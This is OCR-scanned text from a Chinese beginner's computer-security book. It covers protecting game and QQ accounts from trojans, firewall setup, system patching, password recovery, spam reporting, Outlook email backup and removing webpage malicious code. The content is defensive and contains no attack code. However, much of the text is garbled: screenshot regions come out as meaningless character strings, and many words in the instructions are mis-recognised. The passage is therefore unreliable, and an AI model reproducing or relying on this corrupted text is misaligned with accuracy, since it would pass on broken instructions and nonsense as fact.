| 项 固 病 可 水 襄 有 
详 狂 信息 SN 
i 
全 山本 病毒 丰 己 去 杀 可 语 友 于 9 已 知 # 丰 Si 天 病 毒 。 -一 一 一 
进发 提醒 如 上 现 病 过 ， 亚 杀 姑 束 后 ， 请 重启 
默 W 只 要 所 系统 关键 位 于 相 可 棚 动 设备 * 
1 二 写 保护 生 区 必须 重新 白 岳 U 才 。 


强力 侯 瑟 站 络 
查看 二 
和 当前 并 1612031 


门 有 高 这 EN 


step 国 单 去 “开始 扫描 ”按钮 ， 即 可 开始 扫 
描 计算 机 中 的 顽固 病毒 木马 。 


扫 掉 文件 总 数 : 34 
3 病毒 数 。 0 


发 现 病 可 的 。 5 
记 夏 文件 执 : 


强力 修 可 由 络 
二 看 E 志 
当前 新 ,1612031 


门户 有 再 名 迄 i 


[step 图 扫描 完成 后 ， 弹 出 “详细 信息 ” 界 
在 其 中 给 出 扫描 结果 ， 对 于 扫描 出 来 
的 病毒 木马 则 直接 进行 清除 。 


强力 修 加 网 和 
表 看 E 志 


当前 上 本 : 1612031 


林 - 下 未 再? 我 机 1 


10.3.2 ”使 用 远程 控制 方式 盗 取 账 号 的 
防护 


使 用 远程 控制 方式 来 盗 取 网 游 账 号 是 
一 种 比较 常见 的 盗号 方式 ， 通 过 该 方式 可 
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以 远程 查看 、 控 制 目标 计算 机 ， 从 而 拦截 
用 户 的 输入 信息 ， 窃 取 账 号 和 密码 。 

针对 这 种 情况 ， 防 御 起 来 并 不 难 ， 
因为 远程 控制 工具 或 者 是 木马 肯定 要 访问 
网 络 ， 所 以 只 要 在 计算 机 中 安装 “金山 网 
镖 ”等 网 络 防火 墙 ， 木 马 等 就 一 定 逃 不 过 
网 络 防火 墙 的 监视 和 检测 。 因 为 “金山 网 
镖 ”一 直 将 具有 恶意 攻击 的 远程 控制 木马 
加 到 病毒 库 中 ， 这 样 有 利于 《金山 毒霸 》 
对 这 类 木马 进行 查 杀 。 

使 用 “金山 网 镖 ” 拦 截 远 程 盗 号 木马 
或 恶意 攻击 的 具体 操作 步骤 如 下 。 
[sep 回 下 载 并 安装 好 《人 金山 毒霸 》 软 件 后 ， 
将 自动 安装 好 “人 金山 网 镖 ”。 双 击 桌 面 上 
的 “金山 网 镖 2010” 快 捷 图 标 ， 或 选择 
“开始 ”一 “人 金山 毒霸 杀毒 套装 ”一 “人 金 
山 网 镖 ”选项 ， 打 开 “ 爹 山 网 镖 ” 程 序 主 
界面 ， 在 该 界面 中 可 查看 当前 网 络 的 接收 
流量 、 发 送 流量 和 当前 网 络 活动 状态 。 


选择 “应 用 规则 ”选项 卡 ， 在 该 界面 
中 即 可 对 互联 网 监控 和 局 域 网 监控 的 安全 
级 别 进行 设置 。 另 外 ， 还 可 对 防 隐私 泄露 
的 相关 参数 进行 开启 或 关闭 的 设置 。 
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= 黑客 攻防 与 电脑 安全 从 新 手 到 高 手 ( 微 视频 + 火力 升级 版 ) 


step 国 单 南 “IP 规则 ”按钮 ， 在 弹出 面板 中 
单 击 “ 添 加 ”按钮 。 


[Sep 加] 打开 “IP 规 则 编辑 器 ”对 话 框 ， 在 该 
对 话 框 中 的 相应 文本 框 中 输入 要 添加 的 自 
定义 了 规则 名 称 、 描 述 、 对 方 的 了 地 址 、 数 
据 传 输 方向 、 数 据 协议 类 型 、 端 口 及 匹配 
条 件 时 的 动作 等 。 


[EE 
六 


MS: 
ME 


[本 


a 
ee 司 
NAO 
Pan 
到 : 5 


Ero: 


兽 。 DBses OW Os 


|] [mm 


step 园 设置 完毕 后 ， 单 击 “ 确 定 ” 按 钮 ， 即 
可 看 到 刚 添 加 的 IP 规 则 。 单 击 “ 设 置 此 规 
则 ”按钮 ， 即 可 重新 设置 IP 规 则 。 


[Bes 图 选择 “工具 ”一 “综合 设置 ”菜单 
项 ， 打 开 “ 综 合 设置 ”对 话 框 ， 即 可 在 该 
界面 中 对 是 否 开机 自动 运行 金山 网 镖 及 受 
到 攻击 时 的 报警 声音 进行 设置 。 


ER 
回 开关 5 二 
= 

aE Re 

二 


a 
加 和 动人 7 
四 
SR -0 


es 
口 Ensnog 风 


CD Cw 
step 园 选择 “ARP 防 火 墙 ” 选 项， 即 可 在 
打开 的 界面 中 对 是 否 开启 木马 防火 墙 进行 


设置 。 


回忆 Rw 寺 


口 # 二 8 和 和 


rt C9 
通 更 三 盏 Ce 


及 自动 计 ,元 天 了 动容 


单 击 “ 确 定 ” 按 钮 ， 即 可 保存 综合 设 
置 。 这 样 一 旦 本 机 系统 遭受 木马 或 有 害 程序 
的 攻击 ，“ 人 金山 网 杀 ” 即 可 给 出 相应 的 警告 
信息 ， 用 户 可 根据 提示 进行 相应 的 处 理 。 


10.3.3 ”利用 系统 漏洞 盗 取 账号 的 防护 


利用 系统 漏洞 来 盗 取 网 游 账号 ， 是 一 
种 通过 系统 漏洞 在 本 机 植 入 木马 或 者 远程 
控制 工具 ， 然 后 通过 前 面 的 方式 进行 盗号 
活动 。 针 对 这 样 的 盗号 方法 ， 网 游玩 家 可 
以 使 用 很 多 漏洞 扫描 工具 ， 如 《360 安 全 
卫士 》《 电 脑 管家 》 等 工具 帮助 自己 找到 本 
机 系统 的 漏洞 ， 然 后 根据 提示 及 时 把 系统 
漏洞 打上 补丁 ， 做 到 防 患 于 未 然 

使 用 《电脑 管家 》 扫 措 系 统 漏洞 并 为 
系统 打 补丁 的 具体 操作 步 又 如 下 。 
[Ea 下 载 并 安装 《电脑 管家 )》 ， 然 后 
双击 桌面 上 的 快捷 图 标 ， 或 选择 “ 开 
始 ”一 “所 有 程序 ”一 “电脑 管家 ”菜单 
项 ， 即 可 进入 电脑 管家 首页 体验 界面 。 


网 络 账号 及 密码 的 防护 策略 


轻快 如 风 ， 从 心 启程 


六 。 开本 全 屋 中 辣 日 ms 
~ mp 加 


[Gp 国 单 击 “ 电 脑 当前 状态 ”图 标 ， 即 可 开 
始 检测 电脑 的 状态 。 检 测 完毕 后 ， 会 显示 
出 当前 电脑 系统 漏洞 。 


Bes uw Ban em 


成 呈 ! 发 再 17 个 高 名 寺 笛 ， 如 各 天 要 忱 长 时 间 
ee] 


step 图 单 去 “一 键 修复 ”按钮 ， 即 可 开始 下 
载 并 修复 系统 漏洞 。 


ER rn 区 


[Seep 国 修复 完成 后 ， 会 给 出 相应 的 修复 结果 。 


Es -EA 


号 成 功 个 复 9 个 沽 润 ，3 个 补 本 下载 失败 
TR. st 


SpE 


这 样 ， 即 可 防范 盗号 木马 或 有 害 程序 
利用 系统 漏洞 来 盗 取 玩家 账号 、 密 码 等 隐 
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私信 息 。 毕 竟 ， 提 高 防范 意识 就 是 最 好 的 
防范 方法 。 


10.4 ”实战 演练 

实战 演练 1 一 一 找 回 被 瓷 的 QQ 账号 密码 
通过 QQ 申诉 可 以 找 回 密码 ， 但 是 在 找 
回 密码 的 过 程 中 ， 用 户 需 要 让 自己 的 QQ 好 
友 辅 助 进 行 。 下 面 介绍 通过 QQ 申诉 找 回 密 
码 的 具体 操作 步 又 。 


双击 桌面 上 的 QQ 登录 快捷 图 标 ， 打 
开 “QQ 登录 ”窗口 。 


单 击 “ 找 回 密码 ”链接 ， 进 入 “QQ 
安全 中 心 ” 页 面 。 


seen-apato x | 二 二 二 时 
口 16 -eeorroewrn 六 三 网 OQ 


验证 


© sr 


En 


jE 王 3 富 
Rh peerval FA 到 2 


step 图 单 击 “ 单 击 完成 验证 ”链接 ， 打 开 验 
证 页 面 ， 在 其 中 根据 提示 完成 安全 验证 ， 
单 击 “验证 ”按钮 。 
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验证 码 : 


全 ==¥E 


再 次 点 击 画 标 可 取消 并 重 先 EA 


户 “ 验 证 


通过 ”。 


单 击 “ 确 定 ” 按 钮 ， 进 入 “身份 验 
证 ”页 面 ， 在 其 中 单 击 “免费 获取 验证 
码 ” 按 钮 ， 这 时 QQ 安全 中 心 会 给 密 保 手 机 
发 送 一 个 验证 码 ， 用 户 需要 在 下 面 的 文本 
框 中 输入 收 到 的 验证 码 。 
Ce 9 ed 


身份 验证 设置 新 密码 


(各 弛 过 智能 小 安 的 检测 ， 本 次 操作 需要 您 通过 以 下 方式 确认 身份 


请 用 客 保 手机 181#***+*#81 获 取 短 信 验 证 码 已 换 号 ? 


确定 


短信 用 不 了 ? 更 接 其 他 验证 方式 


step 国 单 击 “确定 ”按钮 进入 “设置 新 密 
码 ” 页 面 ， 在 其 中 输入 要 设置 的 新 密码 。 


第 10 章 “网络 账号 及 密码 的 防护 策略 ES 


单 击 “ 确 定 ” 按 钮 ， 重 置 密码 成 功 ， 
这 样 就 找 回 了 被 盗 的 QQ 账号 密码 。 


重 置 密码 成 功 


实战 演练 2 一 一 将 收 到 的 “邮件 炸弹 ” 标 
记 为 垃圾 邮件 


目前 大 多 数 邮箱 都 提供 了 垃圾 邮件 
举报 功能 ， 用 户 可 以 对 收 到 的 垃圾 邮件 进 
行 举 报 ， 避 免 下 次 受到 同样 的 攻击 。 排 除 
“邮件 炸弹 ”就 是 直接 将 其 从 邮件 服务 器 
中 删除 。 

将 接收 到 的 “邮件 炸弹 ”标记 为 垃圾 
邮件 并 举报 的 具体 操作 步骤 如 下 。 
Eee 加 成 功 登录 163 邮 箱 ， 单 击 “ 收 件 
箱 ”， 即 可 在 右 侧 的 “ 收 件 箱 ” 列 表 中 看 
到 收 到 的 邮件 。 


以 件 箱 ( 共 2 封 站 者 地 全 2 封 全 于 ) 
| 删除 | | 尝 根 垃 吉 和 I 件 | | 标记 为 ”| 称 吉 | ”| 可 看 ”| 更 多 


加 志 Y 头 转发 : 12 章 a 

5 Microsoft Outiook 到 坛 戎 息 

涯 2 -未 六 -已 读 -后 半 -下 迁 

| 则 了 || sam 件 || 村 ev | ftplv | 宜生" | 琴 人 ” 列 新 3 上 7 TD 二 


图 匀 选 垃圾 邮件 前 面 的 复 选 框 。 


[TY Pr 
副 阶 六 革 Hi | | 村 为 ”| 和 5 到” | 直下 ”| 更 多 ”| | 剧 新 上 页 T 页 下 
Ui- 


EE | 


Fase B10 


EE TE Ee se 
SK En 

团 吉 7 和 和 CEE 

E 要 icrovoft oullook WR 


二: 全 证 -二 这 -已 -后 迁 -对 


出险 plnepi# | | 村 为 ~ | 和 29(- | 查看 ~ 电 ”|| 出 新 和 上 页 页 二 
Viv 


step 图 单 击 “ 举 报 垃 圾 邮件 ”按钮 ， 打 开 
“举报 垃圾 邮件 ”提示 框 。 


举报 垃圾 邮件 


@ a - 


把 发 件 人 加 入 黑 名 单 
了 发 件 人 的 历史 来 信 (温情) 


[确定 ] | 取消 


[step 图 单 击 “确定 ”按钮 ， 即 可 看 到 “ 举 
报 成 功 ， 已 将 邮件 移入 垃圾 邮件 箱 ” 提 


举报 垃圾 邮件 


©@ 举报 成 功 ,已 将 邮件 移入 垃圾 邮件 箱 ! 
和 封 ， 今 天 系 强 怠 共 收 到 举报 邮件 


拦 夫 过 


时 
[wa]| 上 
step 国 单 去 “确定 ”按钮 ， 即 可 将 选中 的 垃 
圾 邮件 标记 为 垃圾 邮件 。 在 “垃圾 邮件 ” 
选项 卡 下 ， 即 可 看 到 所 标记 的 垃圾 邮件 。 


址 最 岂 件 (= 了 过 站 主 守卫 导 全 兴 力 友 | 下 2 
多 训 几 迭 。。 三 是 ipgl+ 。 全 记 为 ”| zhSf ”下 在 ”更 多 ”| | 出 亲本 上 二 了 证 下 
1 


计生 时 -机 -这 -地 - 工 过 


和 二 二 8 桂 记 为 | 移 iWh ~ 宇 看 >| 严 多 | | 出 部 上 二 页 丰 
1 


[step 图 再 次 选中 要 删除 的 垃圾 邮件 ， 单 击 
“彻底 删除 ”按钮 ， 将 弹出 “删除 确认 ” 
对 话 框 ， 提 示 用 户 “ 如 果 删 除 ， 这 些 邮 件 
将 无 法 恢复 。 您 确定 吗 ?”。 


国 和 8 队 ， 这 此 邮件 尾 无 法 信 复 。 您 确 让 中? 


ET 
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step 园 单 去 “确定 ”按钮 ， 即 可 将 这 些 垃圾 
邮件 从 邮件 服务 器 上 删除 。 


入 邮件 后 


垃圾 邮件 没有 任何 邮件 


| 徊 训 轴 除 | | 不 是 这 性 | | 标记 为 | 交 动 到 ” 查看” | 更 多 ~ | | 刷新 


10.5 “小 试 身 手 


办 练习 1: 通过 向 导 备 份 电子 邮件 


随 着 网 络 的 日 益 普及 ， 越 来 越 多 的 用 
户 使 用 电子 邮件 进行 学 习 、 交 流 、 办 公 及 
娱乐 等 ， 显 然 电 子 邮件 的 内 容 大 多 数 是 比 
较 重 要 的 信息 。 为 了 防止 病毒 〈 如 木马 ) 
的 攻击 导致 电子 邮件 的 丢失 ， 对 电子 邮件 
进行 备份 和 还 原 就 显得 非常 重要 了 。 

使 用 Outlook 中 的 导入 /导出 向 导 功 能 可 
以 备份 电子 邮件 ， 具 体 的 操作 步骤 如 下 。 
[sep 回 启动 Outlook 2016 主 程序 ， 选 择 “ 文 
件 ” 选 项 卡 ， 进 入 “文件 ”界面 ， 在 该 界 
面 中 选择 “打开 和 导出 ”区 域内 的 “导入 / 
导出 ”选项 。 
wh om or 1 - Cc x 


打开 Outlook 数据 文件 


和 于 Olook 坎 归 六 作 ips0， 


导入 /导出 


全 AS 
Net 
其 他 用 户 的 文件 夹 
马 有 tt 二 
se 


[Bp 国 打开 “导入 和 导出 向 导 ” 对 话 框 ， 
在 “请 选择 要 执行 的 操作 ”列表 框 中 选择 
“导出 到 文件 ”选项 。 
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SA 


汪 行 的 委 作 |O: 
从 OpML 文人 导入 RS5 潭 


从 人 zs 到 寺 呈 人 RSS 源 
认 号 一 程 朱 区 六 伯 号 六 


RE sh lendar tLycs) 
号 入 VCARD 文 代 
村 RSS 天 号 到 Sa 


re 
将 Dutlook 六 和 忠 寻 出 到 文件 供 其 他 程序 棱 用 , 
Ee 可 


[step 图 单 去 “下 一 步 ”按钮 ， 打开“ 导出 到 
文件 ”对 话 框 ， 在 “创建 文件 的 类 型 > 列 
表 框 中 选择 “Outlook 数据 文件 (.pst) ” 
选项 。 


SI 件 


Em 本 


[step 园 单 去 “下 一 步 ” 按 钮 ， 打 开 “ 导 出 
Outlook 数 据 文件 ”对 话 框 ， 在 “ 选 定 导 
ed 列表 框 中 选择 要 导出 的 文 


导出 Outook 和 经 文件 x 
ES 
zhan om 
Ny 图 我 的 Outlook 数据 文件 () 


辐 包 括 子 文件 夫人 S) 


入 二 


< 上 2 [2 | wy 


step 园 单 去 “下 一 步 ” 按 钮 ， 打 开 下 一 级 
“导出 Outlook 数 据 文件 ”对 话 框 ， 在 “ 选 


项 ”选项 组 中 选中 “用 寻 出 的 项 目 替 换 重 要 
的 项 目 ” 单 选 按 钮 ， 在 “将 导出 文件 另存 
为 ” 下 的 文本 框 中 输入 文件 保存 的 路 径 。 


导出 Outlook RA 件 时 


单 击 “ 完 成 ”按钮 ， 打 开 “ 创 建 Outloak 
数据 文件 ”对 话 框 ， 在 “密码 ”文本 框 和 
“验证 密码 ”文本 框 中 输入 相同 的 文件 
密码 。 

创建 Outlook 数据 文件 x 


添加 可 选 密码 
密友 (P): 7 | 


单 击 “ 确 定 ” 按 钮 ， 打 开 “Onutlook 
数据 文件 密码 ”对 话 框 ， 在 “密码 ” 文 
本 框 中 输入 文件 的 密码 ， 单 击 “ 确 定 ” 按 
钮 ， 即 可 完成 备份 电子 邮件 的 操作 。 
Outlook 
请 给 入 backup.pst 的 密码 . 


将 密码 保存 在 密码 表 中 (S) 


练习 2: 使 用 向 导 还 原 电子 邮件 


当 电 子 邮 件 丢 失 或 受到 木马 病毒 入 侵 
后 ， 可 以 使 用 备份 的 电子 邮件 来 还 原 。 使 用 
向 导 还 原 电子 邮件 的 具体 操作 步骤 如 下 。 
[step 加 启动 Outlook 2016 主 程序 ， 选择 “ 文 
件 ” 选 项 卡 ， 进 入 “文件 ”界面 ， 在 该 界 
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面 中 选择 “打开 和 导出 ”区 域内 的 “导入 / 
导出 ”选项 。 


打开 Outlook 数据 文件 
TH Otock Exp 


导入 /导出 
BAAD, 


其 他 用 户 的 文件 夹 
有 


Bp 国 打开 “导入 和 导出 向 导 ” 对 话 框 ， 
在 “请 选择 要 执行 的 操作 ”列表 框 中 选择 
“从 另 一 程序 或 文件 导入 ”选项 。 


SimS 


| SA icakendar 文 /8ca 三 VCalender 文体 (wes) 
|sA VCARD ftvel) 
| 村 RSS 源 吕 二 到 OPML 文件 


Hp 
RE 人 与 和 PRE ，950 Outlook RE.PSTi 和 下 六 
体 


7] | ww 


[Step 图 单 南 “ 下 一 步 ”按钮 ， 打开“ 导入 文 
件 ” 对 话 框 ， 在 “从 下 面 位 置 选择 要 导入 
的 文件 类 型 ”对 话 框 中 选择 “Onutlook 数据 
文件 〈.pst) ”选项 。 


号 AE 
从 下 面世 置 选择 要 导入 的 文件 类 型 (S): 
ES 
Em 


step 回 单 去 “下 一 步 ” 按 钮 ， 打 开 “ 导 入 
Outlook 数 据 文件 ”对 话 框 ， 在 “选项 ” 
选项 组 中 选中 “用 导入 的 项 目 蔡 换 重 要 的 
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项 目 ” 单 选 按 钮 ， 在 “导入 文件 ”下 的 文 


本 框 中 输入 导入 文件 的 路 径 ， 或 单 击 “ 浏 ea 
览 ”按钮 ， 打 开 “ 打 开 Outlook 数 据 文件 ” ee 
导入 Outiook 数据 文件 x En 
和 step 园 单 击 “确定 ”按钮 打开“ 导入 
CR - Outlook 数 据 文件 ”对 话 框 ， 选 择 需要 恢复 
人 的 邮件 ， 单 击 “完成 ”按钮 即 可 。 
SNORE RN) 导入 Outlook 到 经 文 件 这 
〇 允许 介 汪 重复 项 目 (A) 
〇 不 入 重复 项 8D) 从 下 面 位 迁 近 要 导入 的 文件 穴 (E); 
医 owock2iX 
回 包括 子 文件 夫 (S) 货运 (P 
Ee 三 
[seo 国 单 去 “下 一 步 ”按钮 ， 打 开 “Outlook en 
数据 文件 密码 ”对 话 框 ， 在 “密码 ”文本 
框 中 输入 数据 文件 的 密码 。 ry 
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网 页 浏览 器 是 进入 网 页 的 入 口 ， 其 中 Internet Explorer 是 使 用 最 广泛 的 Web 浏 览 器 ， 其 
能 非常 强大 ， 但 由 于 支持 JavaScript 脚 本 、ActiveX 控 件 等 元 素 ，Intermnet Explorer 在 浏览 网 


ed dette we 


本 章 介绍 网 页 浏览 


11.1 认识 网 页 恶意 代码 


用 户 在 上 网 时 经 常会 遇 到 偷偷 算 改 IE 
标题 栏 的 网 页 代码 ， 有 的 网 站 更 是 不 择 手 
段 ， 当 用 户 访 问 过 它们 的 网 页 后 ， 不 仅 IE 
默认 首页 被 自 改 了 ， 而 且 每 次 开机 后 IE 都 
会 自动 弹出 访问 该 网 站 。 以 上 这 些 情 况 都 
是 因为 感染 了 网 络 上 的 恶意 代码 。 


11.1.1 恶意 代码 概述 


恶意 代码 (Malicious Code) 的 最 常 
见 表现 形式 就 是 网 页 恶意 代码 。 网 页 恶意 
代码 是 一 种 利用 网 页 进行 破坏 的 计算 机 病 
毒 。 meet ee 
dows 脚 本 宿主 ) 为 基础 ， 使 用 脚本 语言 编 
ap 

当 用 户 登 录 某 些 含有 网 页 病毒 的 网 站 
时 ， 网 页 病毒 便 被 悄悄 激活 。 这 些 病 毒 一 
且 被 激活 ， 可 以 对 用 户 的 计算 机 系统 进行 
破坏 ， 强 行 修 改 用 户 操作 系统 的 注册 表 配 
置 及 系统 实用 配置 程序 ， 甚 至 可 以 对 被 攻 
击 的 计算 机 进行 非法 控制 系统 资源 、 盗 取 
用 户 文件 、 删 除 硬盘 中 的 文件 、 格 式 化 硬 
盘 等 恶意 操作 。 


11.1.2 ”恶意 代码 的 特征 


恶意 代码 或 者 称 为 恶意 软件 〈Mali- 
cious Software) 具有 以 下 共同 特征 。 

e 恶意 的 目的 。 

e 本 身 是 程序 。 

e 通过 执行 发 生 作用 。 


器 的 防护 策略 。 


器 的 安全 也 就 成 了 一 项 刻不容缓 的 工作 。 


有 些 恶 作 剧 程序 或 者 游戏 程序 不 能 被 看 
作恶 意 代 码 。 对 过 滤 性 病毒 的 特征 进行 讨论 
的 文献 很 多 。 尽 管 过 滤 性 病毒 数量 很 多 ， 但 
是 其 机 理 比较 类 似 ， 在 防 病毒 程序 的 防护 范 
围 之 内 ， 更 值得 注意 的 是 非 滤 过 性 病毒 。 


11.1.3 ”恶意 代码 的 传播 方式 


恶意 代码 的 传播 方式 在 迅速 地 演化 ， 从 
引导 区 传播 ， 到 某 种 类 型 文件 传播 、 宏 病毒 
传播 和 邮件 传播 ， 再 到 网 络 传播 ， 恶 意 代码 
发 作 和 流行 的 时 间 越 来 越 短 ， 危 害 越 来 越 大 。 

目前 ， 亚 意 代 码 主要 通过 网 页 浏览 或 下 
载 、 电 子 邮件 、 局 域 网 和 移动 存储 介质 、 即 
时 通信 工具 〈IM) 等 方式 传播 。 广 大 用 户 
遇 到 的 最 常见 的 方式 是 通过 网 页 浏览 进行 攻 
击 ， 这 种 方式 具有 传播 范围 广 、 隐 蔽 性 较 强 
等 特点 ， 潜 在 的 危害 性 也 是 最 大 的 。 


11.2 常见 网 页 恶意 代码 及 攻击 


方法 
网 络 上 的 恶意 代码 各 种 各 样 ， 怎 样 
判断 电脑 是 否 已 经 感染 了 恶意 代码 呢 ? 如 
已 经 感染 了 恶意 代码 ， 又 怎样 进行 清除 
呢 ? 本 节 总 结 了 几 种 最 常见 的 恶意 代码 及 
相应 的 解决 方法 。 


11.2.1 ”启动 时 自动 弹出 对 话 框 和 网 页 


相信 大 多 数 用 户 都 会 遇 到 下 面 的 情况 : 占 
e 系统 启动 时 弹出 对 话 框 ， 通 常 是 一 
些 广告 信息 ， 如 “欢迎 访问 XX 网 


站 ”等 。 

e 开机 弹出 网 页 ， 通 常会 弹出 很 多 窗 
口 ， 让 你 措手不及 ， 更 有 甚 者 可 以 
重复 弹出 窗口 直到 死机 。 

这 就 说 明 恶 意 代码 已 修改 了 用 户 的 注 

册 表 信息 ， 使 得 启动 浏览 器 时 出 现 异常 。 
可 以 通过 编辑 系统 注册 表 来 解决 ， 具 体 的 
操作 步骤 如 下 。 
[step 图 右 去 “开始 ”按钮 ， 在 弹出 的 快捷 菜 
回 单 中 选择 “运行 ”命令 ， 在 弹出 的 “运行 ” 
对 话 框 中 输入 regedit 命 令 。 打开 “注册 表 
编辑 器 ”窗口 ， 依 次 展开 HKEY_LOCAL 
MACHINE\SOFTWARE\Microsoft\Windows\ 
CurrentVersion\Winlogon 主 键 ， 删 除 右 窗 格 中 
的 LegalNoticeCaption 和 LegalNoticeText 两 项 。 


| mm o x 
| Was 册 


步骤 同上 打开 “运行 ”对 话 框 ， 在 其 
中 输入 msconfig 命 令 ， 弹 出 “系统 配置 ”对 
话 框 选择“ 启动 ”选项 卡 。 


E27 


I 
SR, SRNESEEy ES. 


[| 


EE 了 i Ee 


[step 图 单 去 “打开 任务 管理 器 ” 超 链接 ， 打 
开 “ 任 务 管理 器 ”窗口 ， 在 “启动 ”选项 
卡 下 将 URL 扩 展 名 为 .html、.htm 的 网 址 文件 
禁用 即 可 。 
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本 - OO x 
sn lo) EE 
EE a 用 FE 三 可 尾 户 兴 和 ES 


10 4 350en ER 


Te 局 
司 本 332014 专业 二-。 geycnd 工作 在 ES 用 


并 吧 信息 | 二 及 


11.2.2 ”利用 恶意 代码 禁用 注册 表 


有 时 浏览 恶意 网 页 后 系统 被 修改 ， 想 
要 用 regedit 命 令 通过 注册 表 编 辑 器 更 改 时 ， 
却 发 现 系统 提示 没有 权限 运行 该 程序 。 这 
说 明 恶 意 代码 不 但 修改 了 用 户 的 浏览 器 设 
置 ， 甚 至 禁用 了 注册 表 编 辑 功能 。 

遇 到 这 种 情况 ， 用 户 可 以 从 网 上 下 
载 一 个 第 三 方 的 注册 表 编 辑 器 ， 推 荐 使 用 
Registry Workshop 软 件 。Registry Workshop 
是 一 款 高 级 的 注册 表 编 辑 工具 ， 能 够 完全 
蔡 代 Windows 系 统 自 带 的 注册 表 编辑 器 。 

使 用 该 工具 恢复 注册 表 系 统 权 限 的 具 
体操 作 步 骤 如 下 。 
下 载 Registry Workshop 软 件 后 ， 
安装 并 运行 。 在 软件 的 左 窗 格 中 依次 展 
开 HKEY_ CURRENT_USER\Software'\ 
Microsoft\Windows\CurrentVersion\Policies\ 
System 主键 。 


Es! 
Ip CunnenT Usenisom 而 :0 [本 ED 


[step 图 在 右 窗 格 中 把 DisableRegistryTools 
的 DWORD 值 的 “数值 数据 ” 改 为 0。 单 击 


“确定 ”按钮 ， 并 退出 Registry Workshop 软 
件 ， 重 新 启动 计算 机 ， 即 可 恢复 注册 表 的 
系统 权限 。 


二 二 NM 要 5] 8) 收 误工 琴 T 安 DOW) 老 赴 0 
头 旬 自 jX| 了 RI 区 -加 -| 世 2 © 
JSER\Sohwere\Microsctt Windows\Currentersion\Pol 


laxsm 1 [| 
HKEY.CURAENT.USER\Sofin EE 全 :1 1 


11.3 ”网 页 恶意 代码 的 预防 和 
清除 
虽然 有 的 恶意 代码 的 破坏 性 不 是 很 
大 ， 但 是 恶意 代码 常常 会 对 用 户 计算 机 系 
统 做 一 些 强制 设置 ， 并 且 使 得 清除 起 来 非 


常 麻烦 。 因 此 ， 用 户 要 学 会 对 恶意 代码 的 
预防 和 清除 。 


11.3.1 网 页 恶意 代码 的 预防 


用 户 在 上 网 前 和 上 网 时 做 好 如 下 工作 ， 

才能 很 好 地 对 网 页 恶意 代码 进行 预防 。 

e 要 避免 被 网 页 恶意 代码 感染 ， 关 键 
的 是 不 要 轻易 登录 一 些 自己 并 不 了 
解 的 站 点 ， 尤 其 是 一 些 看 上 去 非常 
美丽 诱 人 的 网 址 更 不 要 轻易 进入 ， 
否则 往往 在 不 经 意 间 就 会 误 入 网 页 
恶意 代码 的 圈套 。 

e 微软 官方 经 常 发 布 一 些 漏洞 补丁 ， 
要 及 时 对 当前 操作 系统 及 IE 浏览 器 
进行 更 新 升级 ， 才 能 更 好 地 对 恶意 
代码 进行 预防 。 

。 一 定 要 在 电脑 上 安装 病毒 防火 墙 和 网 
络 防火 墙 ， 并 要 时 刻 打开 “实时 监 
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控 功 能 ”。 通 常 防火 墙 软件 都 内 置 
了 大 量 查 杀 VBS、JavaScript 恶 意 代 
码 的 特征 库 ， 能 够 有 效 地 警示 、 查 
杀 、 隔 离 含 有 恶意 代码 的 网 页 。 

e 对 防火 墙 等 安全 类 软件 进行 定时 升 
级 ， 并 在 升级 后 检查 系统 进程 ， 及 
时 了 解 系统 运行 情况 。 定 期 扫描 系 
统 (包括 毒 病 扫描 与 安全 漏洞 扫 
描 ) ， 以 确保 系统 安全 性 。 

e 关闭 局 域 网 内 系统 的 网 络 硬盘 共享 
功能 ， 防 止 一 台电 脑 中 毒 影响 到 网 
络 内 的 其 他 电脑 。 

e@ 利用 hosts 文 件 可 以 将 已 知 的 广告 服 
务 器 重 定向 到 无 广告 的 机 器 (通常 
是 本 地 的 IP 地 址 : 127.0.0.1) 上 来 过 
滤 广 告 ， 从 而 拦截 一 些 恶意 网 站 的 
请 求 ， 防 止 访 问 欺 诈 网 站 或 感染 一 
些 病毒 或 恶意 软件 。 

e 对 正 浏览 器 进行 详细 安全 设置 。 


11.3.2 ”网 页 恶意 代码 的 清除 


即便 是 电脑 感染 了 恶意 代码 ， 也 不 要 加 
着 急 ， 只 要 用 户 按照 正确 的 方法 操作 是 可 
以 使 系统 恢复 正常 的 。 如 果 用 户 是 个 电脑 
高 手 ， 就 可 以 对 注册 表 进 行 手工 操作 ， 使 
被 恶意 代码 破坏 或 更 改 的 地 方 恢 复 正常 。 
对 于 普通 的 电脑 用 户 来 说 ， 就 需要 使 用 一 
些 专用 工具 来 进行 清除 。 


1. 使 用 《IEScan 恶 意 网 站 清除 》 软 件 


《IEscan 恶 意 网 站 清除 》 软 件 是 功能 强 
大 的 IE 修复 工具 及 流行 病毒 专 杀 工 具 ， 它 
可 以 进行 恶意 代码 的 查 杀 ， 并 对 常见 的 恶 
意 网 络 插件 进行 免疫 。 

使 用 《IEScan 恶 意 网 站 清除 》 软 件 的 
具体 操作 步骤 如 下 。 


[step 图 运行 《IEscan 恶 意 网 站 清除 》 软 件 ， 
单 击 “检测 ”按钮 ， 可 以 对 电脑 系统 进行 
恶意 代码 的 检查 。 直 接 单 击 “治疗 ” 按 
钮 ， 则 可 以 对 IE 浏览 器 进行 修复 。 
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es 


lEscan 
瑟 意 岂 站 身 除 


中 功能 副 : 
epgIRa 
交行 六 专 杀 工 其 


加 需 修复 1E 济 览 吕 
请 直接 点击 治疗 


EE 


单 击 “插件 免疫 ”按钮 ， 显 示 软 件 窗 
口 ， 以 列表 形式 显示 了 已 知 的 恶意 插件 的 
名 称 ， 勾 选 对 应 的 复 选 框 ， 单 击 “ 应 用 ” 
按钮 。 


im i 


1Escan 鱼 | 2 
We Means 
i 
流行 病友 闪 工具 | Ee ri 
te 
st 有 
如 需 收复 1E 划 览 器 TA 
请 直接 吉 由 洛 疗 


2. 使 用 《恶意 软件 查 杀 助 理 》 


《恶意 软件 查 杀 助 理 》 软 件 是 针对 网 上 
流行 的 各 种 木马 病毒 及 恶意 软件 开发 的 。 
《恶意 软件 查 杀 助理 》 可 以 查 杀 超 过 900 多 
款 恶 意 软件 、 木 马 病毒 插件 ， 找 出 隐匿 在 
系统 中 的 木马 病毒 ， 具 体 使 用 方法 如 下 。 
[Sep[ 安装 软件 后 ， 单 击 桌 面 上 的 恶意 软件 
查 杀 助 理 程序 图 标 ， 启 动 恶意 软件 查 杀 助 
理 ， 其 主 界面 如 下 图 所 示 。 


Ne reneeaTe snr eras! > 
a 


人 
EE 


基诺 ， 可 以 有 当天 更 的 和 有 和 人 
NED stecaas 


其 生 功 入 可 以 更 加 宾 昌 册 生生 人 位 


| 
A 
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Step 图 单 去 “扫描 恶意 软件 ”按钮 ， 软 件 开 
